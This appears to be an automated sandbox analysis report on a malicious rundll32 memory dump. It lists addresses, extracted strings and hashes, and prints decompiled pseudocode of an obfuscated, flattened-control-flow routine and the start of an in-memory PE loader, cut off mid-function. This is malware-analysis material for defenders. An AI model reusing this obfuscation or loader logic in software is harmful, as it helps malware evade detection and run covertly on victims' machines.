0x0029a394
0x0029a3a0
0x0029a3a4
0x0029a3ac
0x0029a3b4
0x0029a3c1
0x0029a3c2
0x0029a3cb
0x0029a3cf
0x0029a3d4
0x0029a3dc
0x0029a3ef
0x0029a3f6
0x0029a401
0x0029a40c
0x0029a417
0x0029a422
0x0029a42d
0x0029a438
0x0029a443
0x0029a44e
0x0029a459
0x0029a464
0x0029a46c
0x0029a477
0x0029a482
0x0029a48d
0x0029a498
0x0029a4ac
0x0029a4b3
0x0029a4be
0x0029a4c9
0x0029a4d4
0x0029a4dc
0x0029a4e4
0x0029a4ec
0x0029a4f4
0x0029a4fc
0x0029a50f
0x0029a51e
0x0029a525
0x0029a530
0x0029a53b
0x0029a543
0x0029a54e
0x0029a559
0x0029a564
0x0029a56f
0x0029a57a
0x0029a591
0x0029a592
0x0029a599
0x0029a5a0
0x0029a5a7
0x0029a5b2
0x0029a5bd
0x0029a5c5
0x0029a5d0
0x0029a5db
0x0029a5e6
0x0029a5f1
0x0029a5fc
0x0029a607
0x0029a612
0x0029a61d
0x0029a630
0x0029a637
0x0029a63e
0x0029a649
0x0029a65c
0x0029a663
0x0029a66b
0x0029a676
0x0029a681
0x0029a68c
0x0029a697
0x0029a6a2
0x0029a6ad
0x0029a6b8
0x0029a6c0
0x0029a6cb
0x0029a6d3
0x0029a6db
0x0029a6e3
0x0029a6eb
0x0029a6f3
0x0029a6fe
0x0029a709
0x0029a714
0x0029a71f
0x0029a72a
0x0029a735
0x0029a740
0x0029a748
0x0029a753
0x0029a75e
0x0029a771
0x0029a778
0x0029a789
0x0029a790
0x0029a79b
0x0029a7a6
0x0029a7b1
0x0029a7bc
0x0029a7c7
0x0029a7c7
0x0029a7cc
0x0029a7cc
0x0029a7cc
0x0029a7cc
0x0029a7d2
0x00000000
0x00000000
0x0029a7d8
0x0029a7d8
0x0029ac4a
0x0029ac4f
0x0029ac51
0x0029b0d9
0x0029b0e0
0x0029b0e0
0x0029ac57
0x0029a7cc
0x0029a7cc
0x0029a7cc
0x0029a7d2
0x00000000
0x00000000
0x00000000
0x0029a7d2
0x00000000
0x0029a7cc
0x0029a7de
0x0029a7e0
0x0029aa13
0x0029aa19
0x0029ab1e
0x0029ab24
0x0029ac03
0x0029ac11
0x0029ac16
0x0029ac19
0x0029ac1b
0x0029ac1d
0x0029ac20
0x0029ac25
0x0029ac2e
0x0029ac35
0x0029ac35
0x0029ac3c
0x0029ac3c
0x00000000
0x0029ac3c
0x0029ab2a
0x0029ab30
0x0029abe3
0x00000000
0x0029abe3
0x0029ab36
0x0029ab3c
0x0029ab6a
0x0029ab8f
0x0029abb6
0x0029abc6
0x0029abd1
0x0029abd6
0x0029abd9
0x00000000
0x0029abd9
0x0029ab3e
0x0029ab44
0x00000000
0x00000000
0x0029ab51
0x0029ab5f
0x0029a9f4
0x0029a9f4
0x00000000
0x0029a9f4
0x0029aa1f
0x0029aad0
0x0029aadb
0x0029aae0
0x0029aae3
0x0029aae5
0x00000000
0x00000000
0x0029aaf6
0x0029aafb
0x0029ab03
0x0029ab08
0x0029ab0e
0x0029ab16
0x0029ab16
0x00000000
0x0029ab08
0x0029aa25
0x0029aa2b
0x0029b0c6
0x00000000
0x0029b0c6
0x0029aa31
0x0029aa37
0x0029aaa0
0x0029aaa9
0x0029aab1
0x00000000
0x0029aab1
0x0029aa39
0x0029aa3f
0x0029aa7d
0x0029aa86
0x0029aa88
0x0029aa88
0x0029aa8e
0x0029aa8e
0x00000000
0x0029aa8e
0x0029aa41
0x0029aa47
0x00000000
0x00000000
0x0029aa51
0x0029aa5f
0x0029aa65
0x00000000
0x0029aa65
0x0029a7e6
0x0029b0b8
0x00000000
0x0029b0b8
0x0029a7ec
0x0029a7f2
0x0029a946
0x0029a94c
0x0029a9fe
0x0029aa09
0x00000000
0x0029aa09
0x0029a952
0x0029a958
0x0029a9da
0x0029a9e6
0x0029a9eb
0x0029a9f0
0x0029a9f2
0x00000000
0x0029a9f2
0x0029a95a
0x0029a960
0x0029a9c1
0x0029a9cc
0x00000000
0x0029a9cc
0x0029a962
0x0029a968
0x00000000
0x00000000
0x0029a981
0x0029a988
0x0029a98a
0x0029a8fb
0x0029a8fb
0x00000000
0x0029a8fb
0x0029a990
0x0029a9a3
0x0029a9aa
0x0029a9b0
0x0029a9b7
0x00000000
0x0029a9b7
0x0029a7f8
0x0029a930
0x0029a935
0x0029a93c
0x00000000
0x0029a93c
0x0029a804
0x0029a89e
0x0029a89e
0x0029a8a0
0x0029a8d2
0x0029a8d9
0x0029a8f0
0x0029a8f7
0x0029a8f9
0x0029a90c
0x0029a911
0x0029a913
0x0029a91b
0x0029a91b
0x00000000
0x0029a91b
0x0029a915
0x00000000
0x00000000
0x0029a917
0x0029a919
0x00000000
0x00000000
0x00000000
0x0029a919
0x00000000
0x0029a8f9
0x0029a8a2
0x0029a8a2
0x00000000
0x0029a8a2
0x0029a810
0x0029a886
0x0029a88b
0x0029a892
0x00000000
0x0029a892
0x0029a818
0x0029a869
0x0029a86e
0x00000000
0x0029a86e
0x0029a820
0x0029a84f
0x0029a854
0x00000000
0x0029a854
0x0029a828
0x00000000
0x0029a82e
0x0029a835
0x0029a83a
0x00000000
0x0029a83a
0x0029ac61
0x0029ac61
0x0029ac67
0x0029ae38
0x0029ae3e
0x0029af3e
0x0029af44
0x0029b091
0x0029b097
0x00000000
0x0029b097
0x0029af4a
0x0029af50
0x0029af9e
0x0029afa6
0x0029afb2
0x0029afb7
0x0029afba
0x0029afbc
0x0029b020
0x0029b042
0x0029b05a
0x0029b05f
0x0029b064
0x0029b06b
0x0029b06d
0x0029b06f
0x0029b074
0x0029afbe
0x0029afd8
0x0029aff0
0x0029aff5
0x0029affa
0x0029b001
0x0029b003
0x0029b005
0x0029b00a
0x0029b00a
0x0029a7c7
0x0029a7c7
0x00000000
0x0029a7c7
0x0029a7c7
0x0029af52
0x0029af58
0x0029af80
0x0029af85
0x0029af87
0x00000000
0x00000000
0x0029af8d
0x00000000
0x0029af8d
0x0029af5a
0x0029af60
0x00000000
0x00000000
0x0029af6a
0x0029af6f
0x00000000
0x0029af6f
0x0029ae44
0x0029af34
0x00000000
0x0029af34
0x0029ae4a
0x0029ae50
0x0029af0e
0x0029af15
0x0029af1a
0x0029af21
0x0029af29
0x00000000
0x0029af29
0x0029ae56
0x0029ae5c
0x0029aed1
0x0029aed6
0x0029aed8
0x00000000
0x00000000
0x0029aee5
0x0029aeea
0x00000000
0x0029aeea
0x0029ae5e
0x0029ae64
0x0029b0d4
0x00000000
0x0029b0d4
0x0029ae6a
0x0029ae70
0x00000000
0x00000000
0x0029ae90
0x0029aea8
0x0029aead
0x0029aeb2
0x0029aeb9
0x0029aebb
0x0029aebd
0x0029aec2
0x00000000
0x0029aec2
0x0029ac6d
0x0029ae2e
0x00000000
0x0029ae2e
0x0029ac73
0x0029ac79
0x0029ad82
0x0029ad88
0x0029ae18
0x0029ae1d
0x0029ae24
0x00000000
0x0029ae24
0x0029ad8e
0x0029ad94
0x0029adfd
0x0029ae04
0x0029ae0a
0x00000000
0x0029ae0a
0x0029ad96
0x0029ad9c
0x0029adce
0x0029ade1
0x0029ade8
0x00000000
0x0029ade8
0x0029ad9e
0x0029ada4
0x00000000
0x00000000
0x0029adb8
0x0029adbd
0x00000000
0x0029adbd
0x0029ac7f
0x0029ad41
0x0029ad43
0x0029ad66
0x0029ad6f
0x0029ad77
0x00000000
0x0029ad77
0x0029ad4c
0x0029ad55
0x0029ad57
0x00000000
0x0029ad57
0x0029ac85
0x0029ac8b
0x0029ad26
0x0029ad2b
0x00000000
0x0029ad2b
0x0029ac91
0x0029ac97
0x0029ad0c
0x0029ad11
0x00000000
0x0029ad11
0x0029ac99
0x0029ac9f
0x0029ace7
0x0029acf5
0x0029acfb
0x00000000
0x0029acfb
0x0029aca1
0x0029aca7
0x00000000
0x00000000
0x0029acbb
0x0029acc4
0x0029accd
0x0029acd5
0x0029acd5
0x0029b09c
0x0029b09c
0x00000000
0x0029b0a8

Strings

1B, xrefs: 00299A55
yh, xrefs: 0029A3A4
L], xrefs: 00299F31
]Z, xrefs: 0029A00B
), xrefs: 0029A714
df, xrefs: 0029A254
3T, xrefs: 0029A607
7], xrefs: 0029A56F
J, xrefs: 00299BFD
fo, xrefs: 0029A109
t, xrefs: 00299B71
hLA, xrefs: 00299D94
6(, xrefs: 00299BAA
zR, xrefs: 0029A79B
,9, xrefs: 0029A6FE
Ej8, xrefs: 0029AF52
5, xrefs: 00299DF6
Ej8, xrefs: 0029ADBD
io, xrefs: 00299994
|^, xrefs: 0029A073
H(, xrefs: 00299FA1
*N, xrefs: 0029A11F
8B, xrefs: 0029A2C5
?^, xrefs: 00299BD4
Ip, xrefs: 00299ECB
w\, xrefs: 00299D57
5, xrefs: 0029A6C0
qe, xrefs: 0029A32D
k, xrefs: 0029A530
j, xrefs: 002999C4

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: k$)$*N$,9$1B$3T$5$6($7]$8B$?^$Ip$L]$]Z$df$fo$hLA$io$j$qe$t$w\$yh$zR$|^$5$Ej8$Ej8$H($J
API String ID: 0-2632039745
Opcode ID: 0d45e1a85de10c2851c089422ada8b2c58e15bb708a738fa0b4c18bbe0c08443
Instruction ID: 25b38580d7414ebe92271cb6f4108950160a02276f3a3049941f03e97b9131bb
Opcode Fuzzy Hash: 0d45e1a85de10c2851c089422ada8b2c58e15bb708a738fa0b4c18bbe0c08443
Instruction Fuzzy Hash: EFC212715183818BE7B8DF25C58A7DFBBE1BBC5304F10891DE18A862A0DBB58958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002AA7E4, Relevance: 25.4, Strings: 20, Instructions: 419
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E002AA7E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				void* _t399;
				intOrPtr _t432;
				void* _t442;
				signed int _t445;
				intOrPtr _t456;
				intOrPtr _t457;
				signed int _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				intOrPtr _t469;
				void* _t500;
				intOrPtr* _t508;
				signed int _t511;
				intOrPtr _t516;
				signed int* _t518;
				void* _t520;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t399);
				_v184 = 0x32ca;
				_t518 =  &(( &_v184)[5]);
				_v184 = _v184 + 0xe38a;
				_t457 = 0;
				_t511 = 0x24c7bb9b;
				_t516 = 0;
				_t459 = 9;
				_v184 = _v184 * 0x76;
				_v184 = _v184 | 0x4ce8adb3;
				_v184 = _v184 ^ 0x4ce8e35f;
				_v128 = 0xb34b;
				_v128 = _v128 << 0x10;
				_v128 = _v128 ^ 0xa267c348;
				_v128 = _v128 + 0xcff7;
				_v128 = _v128 ^ 0x112dc3d2;
				_v96 = 0x561;
				_v96 = _v96 / _t459;
				_v96 = _v96 + 0xffff0fdd;
				_v96 = _v96 ^ 0xffff49d0;
				_v100 = 0x463d;
				_v100 = _v100 + 0xffff7752;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xff7b7eaa;
				_v104 = 0xd1d2;
				_t460 = 0x7f;
				_v104 = _v104 / _t460;
				_t461 = 0x1a;
				_v104 = _v104 / _t461;
				_v104 = _v104 ^ 0x00003d68;
				_v168 = 0xe22d;
				_v168 = _v168 + 0x5cc4;
				_v168 = _v168 + 0x1ca6;
				_v168 = _v168 + 0x9ffc;
				_v168 = _v168 ^ 0x0001c172;
				_v60 = 0xd358;
				_v60 = _v60 * 0x17;
				_v60 = _v60 ^ 0x0012fede;
				_v20 = 0x682;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x00004d41;
				_v84 = 0x5803;
				_v84 = _v84 + 0xffffb822;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x00003080;
				_v120 = 0xb23e;
				_v120 = _v120 << 3;
				_v120 = _v120 >> 0x10;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x000024a4;
				_v160 = 0x3bc3;
				_v160 = _v160 << 1;
				_v160 = _v160 + 0xffffa101;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x0000492a;
				_v32 = 0x287c;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x00004507;
				_v16 = 0xafee;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x002bf9ef;
				_v136 = 0xc764;
				_v136 = _v136 + 0xffff1fc0;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x18209c3b;
				_v136 = _v136 ^ 0x18233a52;
				_v40 = 0x84d4;
				_v40 = _v40 + 0xffffad0f;
				_v40 = _v40 ^ 0x00001bb0;
				_v76 = 0x1e9d;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 << 0xe;
				_v76 = _v76 ^ 0x0001d6d4;
				_v24 = 0x74d4;
				_v24 = _v24 + 0x300e;
				_v24 = _v24 ^ 0x0000e4a9;
				_v152 = 0x574f;
				_v152 = _v152 + 0xffff0717;
				_v152 = _v152 + 0xfc1b;
				_t462 = 0x22;
				_v152 = _v152 / _t462;
				_v152 = _v152 ^ 0x000048f1;
				_v56 = 0xa240;
				_v56 = _v56 * 0x13;
				_v56 = _v56 ^ 0x000c421c;
				_v48 = 0x46d8;
				_v48 = _v48 + 0xffff9ed1;
				_v48 = _v48 ^ 0xffff819b;
				_v176 = 0x4c6a;
				_v176 = _v176 << 3;
				_v176 = _v176 * 0x66;
				_v176 = _v176 ^ 0xb95308ef;
				_v176 = _v176 ^ 0xb9a0d115;
				_v92 = 0x7c71;
				_v92 = _v92 + 0xffffd392;
				_v92 = _v92 ^ 0xd6c6ceb0;
				_v92 = _v92 ^ 0xd6c6ee30;
				_v28 = 0x8801;
				_v28 = _v28 | 0x677935f6;
				_v28 = _v28 ^ 0x6779b40f;
				_v36 = 0x3fef;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x000048b4;
				_v156 = 0x355d;
				_v156 = _v156 >> 3;
				_v156 = _v156 << 0xa;
				_v156 = _v156 << 2;
				_v156 = _v156 ^ 0x006ad683;
				_v164 = 0x69f5;
				_v164 = _v164 | 0x7327f048;
				_v164 = _v164 + 0x492e;
				_v164 = _v164 >> 5;
				_v164 = _v164 ^ 0x03997b1a;
				_v132 = 0xe9f0;
				_v132 = _v132 >> 1;
				_v132 = _v132 | 0xa861283e;
				_v132 = _v132 + 0xffff8578;
				_v132 = _v132 ^ 0xa8613649;
				_v140 = 0xd113;
				_v140 = _v140 * 0x71;
				_v140 = _v140 + 0xca3d;
				_v140 = _v140 + 0x73b;
				_v140 = _v140 ^ 0x005d033b;
				_v148 = 0x96c;
				_v148 = _v148 >> 1;
				_v148 = _v148 >> 1;
				_v148 = _v148 * 0x49;
				_v148 = _v148 ^ 0x0000e65c;
				_v72 = 0x842c;
				_v72 = _v72 + 0xffff4ec4;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x07ffb926;
				_v80 = 0xf8c2;
				_t463 = 0xc;
				_v80 = _v80 / _t463;
				_t464 = 0x30;
				_v80 = _v80 * 0x1f;
				_v80 = _v80 ^ 0x0002fba7;
				_v44 = 0x2938;
				_v44 = _v44 | 0x7e3abb4d;
				_v44 = _v44 ^ 0x7e3afbfc;
				_v88 = 0xc2f1;
				_v88 = _v88 / _t464;
				_v88 = _v88 << 0xd;
				_v88 = _v88 ^ 0x00818cb8;
				_v180 = 0x3916;
				_v180 = _v180 + 0x25a3;
				_v180 = _v180 << 0xf;
				_v180 = _v180 + 0xffff7393;
				_v180 = _v180 ^ 0x2f5b8a5b;
				_v112 = 0x3c0f;
				_t465 = 0x2f;
				_v112 = _v112 / _t465;
				_t466 = 0x51;
				_v112 = _v112 * 0x69;
				_v112 = _v112 * 0x68;
				_v112 = _v112 ^ 0x003604d2;
				_v68 = 0x35d7;
				_v68 = _v68 + 0xffff8754;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0xfbd2be10;
				_v116 = 0xa3bd;
				_v116 = _v116 | 0x7a0af30a;
				_v116 = _v116 / _t466;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x181b29eb;
				_v64 = 0xc927;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0xa8f4;
				_v64 = _v64 ^ 0x0000b082;
				_v172 = 0xa13;
				_t467 = 0x70;
				_v172 = _v172 / _t467;
				_t468 = 0x5c;
				_v172 = _v172 * 0x23;
				_v172 = _v172 + 0xe62c;
				_v172 = _v172 ^ 0x0000e950;
				_v52 = 0xa44a;
				_v52 = _v52 >> 0xe;
				_v52 = _v52 ^ 0x00000003;
				_v144 = 0x48ac;
				_v144 = _v144 + 0x6c20;
				_t333 =  &_v144; // 0x6c20
				_v144 =  *_t333 / _t468;
				_t339 =  &_v144; // 0x6c20
				_v144 =  *_t339 * 0x6c;
				_v144 = _v144 ^ 0x0000d435;
				_t508 = _v12;
				while(1) {
					L1:
					_t469 = _v124;
					while(1) {
						_t432 = _v108;
						while(1) {
							L3:
							_t520 = _t511 - 0x23eee725;
							if(_t520 <= 0) {
							}
							L4:
							if(_t520 == 0) {
								_push(_t469);
								_push(_t469);
								_t432 = E002A9E2B("RESCDIR"); // executed
								_t457 = _t432;
								_t518 =  &(_t518[3]);
								if(_t457 != 0) {
									_t511 = 0x1812e6e7;
									goto L12;
								}
							} else {
								_t432 = 0x10b4779f;
								if(_t511 == 0x10b4779f) {
									_push(_t469);
									_t442 = E002A96E9(_t469, _t457, _v84, _t469, _a12, _v120, _t469,  &_v12, _v160, _v32, _t469, _v16, _t469, _v136, _v40, _v76, _v24,  &_v8);
									_t518 =  &(_t518[0x11]);
									if(_t442 == 0) {
										L24:
										_t511 = 0x1b1bcd72;
										goto L12;
									} else {
										_t445 = E002A1214();
										_t511 = 0x1db80426;
										_t432 = _v12 * 0x2c + _t457;
										_v108 = _t432;
										_t508 =  >=  ? _t457 : (_t445 & 0x0000001f) * 0x2c + _t457;
									}
									goto L13;
								} else {
									if(_t511 == 0x1812e6e7) {
										_push(_t469);
										_push(_t469);
										_t516 = E002A9E2B(0x2000);
										_t518 =  &(_t518[3]);
										_t511 =  !=  ? 0x10b4779f : 0x197e9f99;
										goto L12;
									} else {
										if(_t511 == 0x197e9f99) {
											return E0029EF80(_v116, _t457, _v64);
										}
										if(_t511 == 0x1b1bcd72) {
											E0029EF80(_v112, _t516, _v68);
											_t511 = 0x197e9f99;
											L12:
											_t432 = _v108;
											L13:
											_t469 = _v124;
											_t500 = 0x27ca871e;
											continue;
										} else {
											if(_t511 != 0x1db80426) {
												L28:
												if(_t511 != 0x6a1915b) {
													goto L1;
												}
											} else {
												_t456 = E0029E172(_v48, _v176, _a12, _v144,  *_t508, _v92); // executed
												_t469 = _t456;
												_t518 =  &(_t518[4]);
												_v124 = _t469;
												_t500 = 0x27ca871e;
												_t511 =  !=  ? 0x27ca871e : 0x25b495e5;
												_t432 = _v108;
												while(1) {
													L3:
													_t520 = _t511 - 0x23eee725;
													if(_t520 <= 0) {
													}
													goto L19;
												}
												goto L4;
											}
										}
									}
								}
							}
							L31:
							return _t432;
							L19:
							if(_t511 == 0x24c7bb9b) {
								_t511 = 0x23eee725;
								goto L28;
							} else {
								if(_t511 == 0x25b495e5) {
									_t508 = _t508 + 0x2c;
									asm("sbb esi, esi");
									_t511 = (_t511 & 0x029c36b4) + 0x1b1bcd72;
									continue;
								} else {
									if(_t511 == _t500) {
										E002992D8( &_v4, _v28, _t516, _v36, _v156, _t469, _v164, _t469, _v172);
										_t511 =  !=  ? 0x28c00c53 : 0x25b495e5;
										_t432 = E002930A4(_v124, _v132, _v140, _v148, _v72);
										_t518 =  &(_t518[0xa]);
										_t500 = 0x27ca871e;
										goto L28;
									} else {
										_t432 = 0x28c00c53;
										if(_t511 != 0x28c00c53) {
											goto L28;
										} else {
											E002A9899(_v80, _a4, _v44, _v88, _v180, _t516, _v52);
											_t518 =  &(_t518[5]);
											goto L24;
										}
									}
								}
							}
							goto L31;
						}
					}
				}
			}

0x002aa7ee
0x002aa7f5
0x002aa7fc
0x002aa803
0x002aa804
0x002aa805
0x002aa80a
0x002aa812
0x002aa815
0x002aa824
0x002aa826
0x002aa82b
0x002aa82f
0x002aa832
0x002aa836
0x002aa83e
0x002aa846
0x002aa84e
0x002aa853
0x002aa85b
0x002aa863
0x002aa86b
0x002aa87b
0x002aa87f
0x002aa887
0x002aa88f
0x002aa897
0x002aa89f
0x002aa8a4
0x002aa8ac
0x002aa8b8
0x002aa8bd
0x002aa8c7
0x002aa8ca
0x002aa8ce
0x002aa8d6
0x002aa8de
0x002aa8e6
0x002aa8ee
0x002aa8f6
0x002aa8fe
0x002aa911
0x002aa918
0x002aa923
0x002aa92e
0x002aa936
0x002aa941
0x002aa949
0x002aa951
0x002aa956
0x002aa95e
0x002aa966
0x002aa96b
0x002aa970
0x002aa975
0x002aa97d
0x002aa985
0x002aa989
0x002aa991
0x002aa996
0x002aa99e
0x002aa9a9
0x002aa9b0
0x002aa9bb
0x002aa9c8
0x002aa9d0
0x002aa9db
0x002aa9e3
0x002aa9eb
0x002aa9f0
0x002aa9f8
0x002aaa00
0x002aaa0b
0x002aaa16
0x002aaa21
0x002aaa29
0x002aaa2e
0x002aaa33
0x002aaa3b
0x002aaa46
0x002aaa51
0x002aaa5c
0x002aaa64
0x002aaa6c
0x002aaa7a
0x002aaa7d
0x002aaa81
0x002aaa89
0x002aaa9c
0x002aaaa3
0x002aaaae
0x002aaab9
0x002aaac4
0x002aaacf
0x002aaad7
0x002aaae1
0x002aaae5
0x002aaaed
0x002aaaf5
0x002aaafd
0x002aab05
0x002aab0d
0x002aab15
0x002aab20
0x002aab2b
0x002aab36
0x002aab41
0x002aab49
0x002aab54
0x002aab5c
0x002aab61
0x002aab66
0x002aab6b
0x002aab73
0x002aab7b
0x002aab83
0x002aab8b
0x002aab90
0x002aab98
0x002aaba0
0x002aaba4
0x002aabac
0x002aabb4
0x002aabbc
0x002aabc9
0x002aabcd
0x002aabd5
0x002aabdd
0x002aabe5
0x002aabed
0x002aabf1
0x002aabfa
0x002aabfe
0x002aac06
0x002aac11
0x002aac1c
0x002aac24
0x002aac31
0x002aac3f
0x002aac44
0x002aac4f
0x002aac52
0x002aac56
0x002aac5e
0x002aac69
0x002aac74
0x002aac7f
0x002aac8f
0x002aac93
0x002aac98
0x002aaca0
0x002aaca8
0x002aacb0
0x002aacb5
0x002aacbd
0x002aacc5
0x002aacd1
0x002aacd6
0x002aace1
0x002aace4
0x002aaced
0x002aacf1
0x002aacf9
0x002aad04
0x002aad0f
0x002aad17
0x002aad22
0x002aad2a
0x002aad3a
0x002aad3e
0x002aad43
0x002aad4b
0x002aad56
0x002aad5e
0x002aad69
0x002aad74
0x002aad80
0x002aad85
0x002aad90
0x002aad91
0x002aad95
0x002aad9d
0x002aada5
0x002aadb0
0x002aadb8
0x002aadc0
0x002aadc8
0x002aadd0
0x002aadd6
0x002aadda
0x002aaddf
0x002aade8
0x002aadf0
0x002aadf7
0x002aadf7
0x002aadf7
0x002aadfb
0x002aadfb
0x002aadff
0x002aadff
0x002aadff
0x002aae05
0x002aae05
0x002aae0b
0x002aae0b
0x002aaf96
0x002aaf97
0x002aaf9d
0x002aafa2
0x002aafa4
0x002aafa9
0x002aafaf
0x00000000
0x002aafaf
0x002aae11
0x002aae11
0x002aae18
0x002aaeea
0x002aaf41
0x002aaf46
0x002aaf4b
0x002ab00f
0x002ab00f
0x00000000
0x002aaf51
0x002aaf5c
0x002aaf64
0x002aaf76
0x002aaf7a
0x002aaf7e
0x002aaf7e
0x00000000
0x002aae1e
0x002aae24
0x002aaec8
0x002aaec9
0x002aaed4
0x002aaed6
0x002aaee5
0x00000000
0x002aae2a
0x002aae30
0x00000000
0x002ab0b3
0x002aae3c
0x002aae95
0x002aae9b
0x002aaea0
0x002aaea0
0x002aaea4
0x002aaea4
0x002aaea8
0x00000000
0x002aae3e
0x002aae44
0x002ab094
0x002ab09a
0x00000000
0x002ab09c
0x002aae4a
0x002aae66
0x002aae6b
0x002aae6d
0x002aae72
0x002aae7b
0x002aae80
0x002aadfb
0x002aadff
0x002aadff
0x002aadff
0x002aae05
0x002aae05
0x00000000
0x002aae05
0x00000000
0x002aadff
0x002aae44
0x002aae3c
0x002aae24
0x002aae18
0x002ab0be
0x002ab0be
0x002aafb9
0x002aafbf
0x002ab08f
0x00000000
0x002aafc5
0x002aafcb
0x002ab077
0x002ab07c
0x002ab084
0x00000000
0x002aafd1
0x002aafd3
0x002ab03d
0x002ab065
0x002ab068
0x002ab06d
0x002ab070
0x00000000
0x002aafd5
0x002aafd5
0x002aafdc
0x00000000
0x002aafe2
0x002ab007
0x002ab00c
0x00000000
0x002ab00c
0x002aafdc
0x002aafd3
0x002aafcb
0x00000000
0x002aafbf
0x002aadff
0x002aadfb

Strings

*I, xrefs: 002AA996
8), xrefs: 002AAC5E
AM, xrefs: 002AA936
|(, xrefs: 002AA99E
?, xrefs: 002AAB36
_L, xrefs: 002AA83E
%#, xrefs: 002AADFF
RESCDIR, xrefs: 002AAF98
h=, xrefs: 002AA8CE
P, xrefs: 002AAD9D
=F, xrefs: 002AA88F
\, xrefs: 002AABFE
%#, xrefs: 002AB08F
-, xrefs: 002AA8D6
l\, xrefs: 002AADD0
]5, xrefs: 002AAB54
.I, xrefs: 002AAB83
q|, xrefs: 002AAAF5
OW, xrefs: 002AAA5C
jL, xrefs: 002AAACF

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: l\$%#$%#$*I$-$.I$8)$=F$AM$OW$P$RESCDIR$\$]5$_L$h=$jL$q|$|($?
API String ID: 1725840886-1474407461
Opcode ID: 2a4b521dbba38fcac2e7eb88fb70370b31b8704d422fbf354a0c58e40634850f
Instruction ID: dfdf47a7efb5d6e15ceffa2d11122fc52c45ca303af7af4f1a0f0ebdbd582c06
Opcode Fuzzy Hash: 2a4b521dbba38fcac2e7eb88fb70370b31b8704d422fbf354a0c58e40634850f
Instruction Fuzzy Hash: 282222725083809FE368CF65C58AA4FFBE1BBC5344F50891DE6D9862A0DBB58958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10004500, Relevance: 15.2, APIs: 10, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10004500(intOrPtr __ecx) {
				void* _t62;
				signed int _t68;
				signed int _t70;
				void* _t71;
				long _t73;
				void* _t81;
				intOrPtr _t84;
				intOrPtr _t92;
				void* _t101;
				intOrPtr _t102;
				void* _t103;
				intOrPtr* _t105;
				signed char _t108;
				void* _t110;
				void* _t111;
				void* _t120;
				intOrPtr _t122;
				intOrPtr _t131;
				intOrPtr* _t137;
				intOrPtr _t146;
				intOrPtr* _t149;
				long _t152;
				long _t153;
				signed int _t154;
				void* _t155;
				void* _t156;
				void* _t158;

				_t147 =  *((intOrPtr*)(_t158 + 0x3c));
				 *((intOrPtr*)(_t158 + 0x14)) = __ecx;
				_t155 = 0;
				_t62 = E10003D80( *((intOrPtr*)(_t158 + 0x3c)), 0x40);
				if(_t62 != 0) {
					_t105 =  *((intOrPtr*)(_t158 + 0x3c));
					if( *_t105 != 0x5a4d) {
						L16:
						SetLastError(0xc1);
						return 0;
					} else {
						if(E10003D80(_t147,  *((intOrPtr*)(_t105 + 0x3c)) + 0xf8) == 0) {
							L35:
							return 0;
						} else {
							_t149 =  *((intOrPtr*)(_t105 + 0x3c)) + _t105;
							if( *_t149 != 0x4550 ||  *((intOrPtr*)(_t149 + 4)) != 0x14c) {
								goto L16;
							} else {
								_t108 =  *(_t149 + 0x38);
								if((_t108 & 0x00000001) != 0) {
									goto L16;
								} else {
									_t120 = ( *(_t149 + 0x14) & 0x0000ffff) + _t149 + 0x18;
									_t68 =  *(_t149 + 6) & 0x0000ffff;
									if(_t68 > 0) {
										_t137 = _t120 + 0xc;
										_t154 = _t68;
										do {
											_t146 =  *((intOrPtr*)(_t137 + 4));
											_t102 =  *_t137;
											if(_t146 != 0) {
